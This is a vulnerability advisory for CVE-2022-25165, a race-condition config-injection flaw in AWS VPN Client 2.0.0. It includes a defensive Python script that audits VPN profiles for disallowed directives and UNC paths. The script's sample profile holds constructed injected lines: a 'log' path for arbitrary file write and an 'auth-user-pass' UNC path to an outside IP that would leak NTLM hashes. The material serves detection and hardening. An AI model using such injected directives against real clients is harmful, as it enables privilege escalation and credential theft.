PT-2022-2555 · Amazon · Amazon Aws Client Vpn

David Yesland · Published 2022-02-15 · Updated 2024-12-26 · CVE-2022-25165

CVSS v3.1: 7.0 High
Vector: AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Name of the Vulnerable Software and Affected Versions: Amazon AWS VPN Client version 2.0.0

Description: An issue exists in the Amazon AWS VPN Client that allows parameters outside of the allow list to be injected into the configuration file. This can lead to an arbitrary file write as SYSTEM with partial control over the file's content, potentially causing an elevation of privilege or denial of service. A TOCTOU race condition exists during the validation of VPN configuration files, allowing a low-privileged user to inject dangerous arguments. For example, the log parameter can be used to specify an arbitrary destination for writing log files. Additionally, it is possible to include a UNC path in the OpenVPN configuration file, which can leak the user's Net-NTLMv2 hash to an external server when the client attempts to validate the file path.

Recommendations: For Amazon AWS VPN Client version 2.0.0, consider disabling the log parameter in the configuration file to prevent arbitrary file writes until a patch is available. Restrict access to the configuration file to minimize the risk of exploitation. Avoid using the auth-user-pass parameter with UNC paths in the OpenVPN configuration file until the issue is resolved. As a temporary workaround, monitor the configuration file for any changes and remove any malicious directives. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
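The recommendations above amount to a check an administrator can script: walk the profile, flag any directive that is not on an allow list (with file-writing directives such as log treated as high severity) and flag any argument that is a UNC path. The Python below is an added example written for this advisory; it is not code from the advisory, from Amazon or from the AWS VPN Client, and its ALLOWED_DIRECTIVES set and SAMPLE_PROFILE are constructed for illustration rather than taken from the client's real allow list. It also produces a SHA-256 digest of the profile text so that the file can be re-checked for changes between the time it is validated and the time it is consumed.

```python
"""Audit an OpenVPN-style VPN profile for directives outside an allow list and
for UNC paths in directive arguments.

Added example for this advisory: not code from Amazon or the AWS VPN Client.
ALLOWED_DIRECTIVES is a constructed, illustrative allow list, not the client's.
"""
import hashlib
import re
import shlex

# Constructed allow list of directives a hardened client profile is expected to use.
ALLOWED_DIRECTIVES = {
    "client", "dev", "proto", "remote", "resolv-retry", "nobind",
    "persist-key", "persist-tun", "remote-cert-tls", "cipher", "verb",
    "reneg-sec", "auth-user-pass", "auth-retry",
}

# OpenVPN directives whose argument is a path the (privileged) process writes to.
FILE_WRITE_DIRECTIVES = {"log", "log-append", "writepid", "status"}

# UNC path in either slash style: \\host\share or //host/share.
UNC_PATH = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")


def audit_profile(text, allowlist=ALLOWED_DIRECTIVES):
    """Return findings as (line_no, severity, message) tuples."""
    findings = []
    in_block = False
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if in_block:                      # inside an inline block such as <ca> ... </ca>
            if line.startswith("</"):
                in_block = False
            continue
        if not line or line[0] in "#;":   # blank line or comment
            continue
        if line.startswith("<"):          # opening tag of an inline block
            in_block = True
            continue
        # Non-POSIX shlex keeps backslashes and quote characters intact, so
        # Windows paths survive tokenising; surrounding quotes are stripped after.
        try:
            tokens = [t.strip("\"'") for t in shlex.split(line, posix=False)]
        except ValueError as exc:         # unbalanced quotes
            findings.append((line_no, "medium", f"unparseable line ({exc})"))
            continue
        directive, args = tokens[0], tokens[1:]
        if directive not in allowlist:
            severity = "high" if directive in FILE_WRITE_DIRECTIVES else "medium"
            findings.append((line_no, severity,
                             f"directive '{directive}' is outside the allow list"))
        for arg in args:
            if UNC_PATH.match(arg):
                findings.append((line_no, "high",
                                 f"UNC path argument to '{directive}': {arg}"))
    return findings


def profile_digest(text):
    """SHA-256 of the profile text, to detect changes between validation and use."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# Constructed sample profile: a plain client profile with two injected lines.
SAMPLE_PROFILE = (
    "client\n"
    "dev tun\n"
    "proto udp\n"
    "remote vpn.example.com 443\n"
    "remote-cert-tls server\n"
    "cipher AES-256-GCM\n"
    "verb 3\n"
    "<ca>\n"
    "CONSTRUCTED-PLACEHOLDER-CERTIFICATE-BODY\n"
    "</ca>\n"
    "# constructed injected lines: a log destination and a UNC credentials path\n"
    "log C:\\Windows\\Temp\\injected.log\n"
    "auth-user-pass \\\\203.0.113.5\\share\\creds.txt\n"
)

if __name__ == "__main__":
    print("sha256:", profile_digest(SAMPLE_PROFILE))
    for line_no, severity, message in audit_profile(SAMPLE_PROFILE):
        print(f"line {line_no}: [{severity}] {message}")
```

Because the advisory describes a TOCTOU gap between validation and use, a single pass over the file is not a complete control on its own: record profile_digest at validation time and compare it again when the profile is consumed (or watch the file for modification, as the recommendations suggest), and keep the profile where a low-privileged user cannot modify it.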

Exploit

DoS

LPE

Race Condition

Information Disclosure

Time Of Check To Time Of Use

Weakness Enumeration

Related Identifiers

BDU:2022-02980
BDU:2022-02981
CVE-2022-25165

Affected Products

Amazon Aws Client Vpn